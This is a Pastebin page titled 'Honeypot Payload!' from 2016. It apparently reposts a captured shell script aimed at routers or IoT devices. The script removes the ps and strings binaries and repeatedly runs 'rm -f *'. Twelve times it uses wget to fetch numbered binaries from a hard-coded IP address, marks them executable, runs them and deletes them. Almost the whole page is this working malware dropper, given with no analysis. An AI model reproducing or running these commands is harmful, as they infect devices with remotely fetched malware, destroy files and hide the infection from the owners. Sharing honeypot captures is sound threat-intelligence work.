Advertisement
recon-scout

Honeypot Payload! Seen on: 2016-06-22 20:07

Jun 22nd, 2016
172
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.93 KB | None | 0 0
  1. #!/bin/sh
  2.  
  3. busybox rm -f /usr/bin/strings || rm -f /usr/bin/strings
  4. busybox rm -f /usr/bin/ps || rm -f /usr/bin/ps
  5. busybox rm -f bin.sh || rm -f bin.sh
  6.  
  7. # RM spam because routers don't have much memory boi
  8. rm -f *
  9. busybox wget http://91.134.169.94/1 || wget http://91.134.169.94/1; busybox chmod +x 1 || chmod +x 1; ./1; busybox rm -f 1* || rm -f 1*
  10. rm -f *
  11. busybox wget http://91.134.169.94/2 || wget http://91.134.169.94/2; busybox chmod +x 2 || chmod +x 2; ./2; busybox rm -f 2* || rm -f 2*
  12. rm -f *
  13. busybox wget http://91.134.169.94/3 || wget http://91.134.169.94/3; busybox chmod +x 3 || chmod +x 3; ./3; busybox rm -f 3* || rm -f 3*
  14. rm -f *
  15. busybox wget http://91.134.169.94/4 || wget http://91.134.169.94/4; busybox chmod +x 4 || chmod +x 4; ./4; busybox rm -f 4* || rm -f 4*
  16. rm -f *
  17. busybox wget http://91.134.169.94/5 || wget http://91.134.169.94/5; busybox chmod +x 5 || chmod +x 5; ./5; busybox rm -f 5* || rm -f 5*
  18. rm -f *
  19. busybox wget http://91.134.169.94/6 || wget http://91.134.169.94/6; busybox chmod +x 6 || chmod +x 6; ./6; busybox rm -f 6* || rm -f 6*
  20. rm -f *
  21. busybox wget http://91.134.169.94/7 || wget http://91.134.169.94/7; busybox chmod +x 7 || chmod +x 7; ./7; busybox rm -f 7* || rm -f 7*
  22. rm -f *
  23. busybox wget http://91.134.169.94/8 || wget http://91.134.169.94/8; busybox chmod +x 8 || chmod +x 8; ./8; busybox rm -f 8* || rm -f 8*
  24. rm -f *
  25. busybox wget http://91.134.169.94/9 || wget http://91.134.169.94/9; busybox chmod +x 9 || chmod +x 9; ./9; busybox rm -f 9* || rm -f 9*
  26. rm -f *
  27. busybox wget http://91.134.169.94/10 || wget http://91.134.169.94/10; busybox chmod +x 10 || chmod +x 10; ./10; busybox rm -f 10* || rm -f 10*
  28. rm -f *
  29. busybox wget http://91.134.169.94/11 || wget http://91.134.169.94/11; busybox chmod +x 11 || chmod +x 11; ./11; busybox rm -f 11* || rm -f 11*
  30. rm -f *
  31. busybox wget http://91.134.169.94/12 || wget http://91.134.169.94/12; busybox chmod +x 12 || chmod +x 12; ./12; busybox rm -f 12* || rm -f 12*
  32. rm -f *
  33. sleep 1
  34. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement